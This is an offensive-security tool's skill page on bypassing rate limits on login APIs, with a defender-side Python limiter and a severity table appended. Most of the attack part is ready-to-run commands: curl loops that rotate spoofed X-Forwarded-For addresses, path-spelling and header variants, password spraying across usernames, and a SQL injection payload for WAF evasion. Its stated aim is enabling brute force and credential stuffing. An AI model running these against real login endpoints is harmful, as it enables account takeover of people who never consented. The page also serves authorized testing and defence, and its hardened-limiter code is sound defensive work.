attack-rate-limit-bypass
Rate limit bypass testing — XFF rotation, case variation, method switching, header manipulation
| Field | Value |
|---|---|
| name | attack-rate-limit-bypass |
| description | Rate limit bypass testing — XFF rotation, case variation, method switching, header manipulation |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["rate-limit","brute-force","web","bypass","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-307","CWE-770"] |
| chains_with | ["attack-race-condition"] |
| prerequisites | [] |
| severity_boost | {"attack-race-condition":"Rate limit bypass + race condition = unlimited exploitation"} |
Bypass rate limiting mechanisms to enable brute-force attacks, credential stuffing, or abuse of rate-limited functionality.
```shell
# Full bypass test suite (5 techniques)
attack_script rate_limit_bypass "https://TARGET/api/login" \
  --method POST \
  -H "Content-Type:application/json" \
  -d '{"email":"test@test.com","password":"test"}' \
  --count 20 \
  --json-output
```
The suite runs the following techniques automatically; each is shown below as a standalone command so individual results can be reproduced:
```shell
# Rotate source IP via headers
for i in $(seq 1 50); do
  IP="$((RANDOM%254+1)).$((RANDOM%254+1)).$((RANDOM%254+1)).$((RANDOM%254+1))"
  curl -s -o /dev/null -w "%{http_code} " \
    -X POST https://TARGET/api/login \
    -H "X-Forwarded-For: $IP" \
    -H "X-Real-IP: $IP" \
    -H "X-Client-IP: $IP" \
    -d '{"email":"test@test.com","password":"guess"}'
done
```
```shell
# Path case variation
curl https://TARGET/API/LOGIN
curl https://TARGET/Api/Login
# Trailing slash/dot
curl https://TARGET/api/login/
curl https://TARGET/api/login/.
# Double slash
curl https://TARGET//api//login
# Random query params (new cache key)
curl "https://TARGET/api/login?_=$(date +%s)"
```
```shell
# Header manipulation
curl -X POST https://TARGET/api/login \
  -H "X-Forwarded-For: 127.0.0.1"
curl -X POST https://TARGET/api/login \
  -H "X-Forwarded-Host: localhost"
curl -X POST https://TARGET/api/login \
  -H "X-Original-URL: /api/login"
curl -X POST https://TARGET/api/login \
  -H "X-Custom-IP-Authorization: 127.0.0.1"
```
```shell
# Distribute across usernames
for user in user1 user2 user3; do
  curl -X POST https://TARGET/api/login \
    -d "{\"email\":\"$user@test.com\",\"password\":\"common_password\"}"
done
# IP rotation + distributed usernames = bypass
```
```shell
# Encode payloads to avoid WAF detection
attack_script waf_bypass "admin' OR 1=1--" --test-url "https://TARGET/api/login" --param password
```
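Every technique above works against a limiter that keys on something the caller controls: an `X-Forwarded-For` value taken at face value, the raw path spelling, or one counter per request method. The following is an added, defender-side example (hypothetical code written for this page, not part of the skill's tooling) that puts a naive limiter next to a hardened one. It assumes the application's own proxies live in `10.0.0.0/8` and that `SlidingWindowLimiter`, `client_ip`, `normalize_route` and the constructed traffic are all invented for the demonstration. The hardened version derives the client address by walking `X-Forwarded-For` from the right past trusted hops only, folds case, `//`, `/.`, trailing-slash and query-string variants into one route key, and counts per target account as well as per IP, so rotating addresses and rotating usernames each still trip a counter.

```python
"""Defender-side demonstration (hypothetical example code, not the skill page's
tooling): a rate limiter keyed on spoofable request attributes beside one
keyed on the trusted-proxy-derived client IP, a normalized route, and the
account under attack."""
import ipaddress
import re
from collections import defaultdict, deque

# Assumption: the only proxies in front of the app live in 10.0.0.0/8.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]
MAX_ATTEMPTS = 5      # attempts per key per window
WINDOW_SECONDS = 60


def _is_trusted(ip):
    try:
        return any(ipaddress.ip_address(ip) in net for net in TRUSTED_PROXIES)
    except ValueError:
        return False


def client_ip(peer_ip, xff):
    """Derive the client address. Only hops appended by our own proxies are
    believed; everything further left in X-Forwarded-For is caller-supplied."""
    if not _is_trusted(peer_ip):
        return peer_ip                      # direct connection: ignore the header
    for hop in reversed([h.strip() for h in (xff or "").split(",") if h.strip()]):
        if not _is_trusted(hop):
            return hop
    return peer_ip


def normalize_route(path):
    """Fold case, query string, duplicate slashes, '/.' segments and trailing
    slashes into one key so every spelling shares a single counter."""
    path = path.split("?", 1)[0].split("#", 1)[0]
    path = re.sub(r"/+", "/", path)
    path = re.sub(r"/\.(?=/|$)", "", path)
    return (path.rstrip("/") or "/").lower()


class SlidingWindowLimiter:
    def __init__(self, max_attempts=MAX_ATTEMPTS, window=WINDOW_SECONDS):
        self.max_attempts, self.window = max_attempts, window
        self._hits = defaultdict(deque)

    def allow(self, key, now):
        q = self._hits[key]
        while q and now - q[0] >= self.window:
            q.popleft()
        q.append(now)                       # denied attempts count too
        return len(q) <= self.max_attempts


def naive_check(limiter, req, now):
    """Weak: believes X-Forwarded-For outright, keys on raw path and method."""
    ip = req.get("xff") or req["peer_ip"]
    return limiter.allow(f'{ip}|{req["method"]}|{req["path"]}', now)


def hardened_check(limiter, req, now):
    """Keys on derived client IP + route and on target account + route. Both
    must pass: rotating IPs still trips the account counter, rotating
    accounts still trips the IP counter."""
    ip = client_ip(req["peer_ip"], req.get("xff"))
    route = normalize_route(req["path"])
    by_ip = limiter.allow(f"ip|{ip}|{route}", now)
    by_account = limiter.allow(f'acct|{req["account"].lower()}|{route}', now)
    return by_ip and by_account


def constructed_rotating_traffic(n=50):
    """Constructed sample: n login attempts against one account, each carrying a
    fresh spoofed X-Forwarded-For entry and a different path spelling, arriving
    from real client 203.0.113.7 via trusted proxy 10.0.0.5 (all values made up)."""
    variants = ["/api/login", "/API/LOGIN", "/api/login/", "/api/login/.",
                "//api//login", "/api/login?_=1700000000"]
    return [{"peer_ip": "10.0.0.5",
             "xff": f"198.51.100.{i % 250 + 1}, 203.0.113.7",
             "method": "POST", "path": variants[i % len(variants)],
             "account": "victim@example.com"} for i in range(n)]


def count_allowed(check, requests):
    """Replay requests inside one window; return how many the limiter let through."""
    limiter = SlidingWindowLimiter()
    return sum(1 for i, r in enumerate(requests) if check(limiter, r, i * 0.1))


if __name__ == "__main__":
    traffic = constructed_rotating_traffic()
    print("naive limiter allowed:   ", count_allowed(naive_check, traffic))
    print("hardened limiter allowed:", count_allowed(hardened_check, traffic))
```

Run stand-alone, the naive limiter lets all 50 constructed attempts through because every request lands on a fresh key, while the hardened limiter stops after `MAX_ATTEMPTS`. The same keys double as detection signals: a spike of denied attempts on one `acct|…` key with many distinct left-hand `X-Forwarded-For` values is the rotation pattern from the commands above, and is worth alerting on even where the limiter itself holds.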
| Finding | Severity |
|---|---|
| Rate limit bypass on login/auth endpoint | High (P2) |
| Rate limit bypass on password reset | High (P2) |
| Rate limit bypass on OTP/2FA verification | Critical (P1) |
| Rate limit bypass on financial operations | Critical (P1) |
| Rate limit bypass on non-sensitive endpoint | Low (P4) |
- `attack_script rate_limit_bypass` — automated 5-technique bypass testing
- `attack_script waf_bypass` — encoding variants for WAF bypass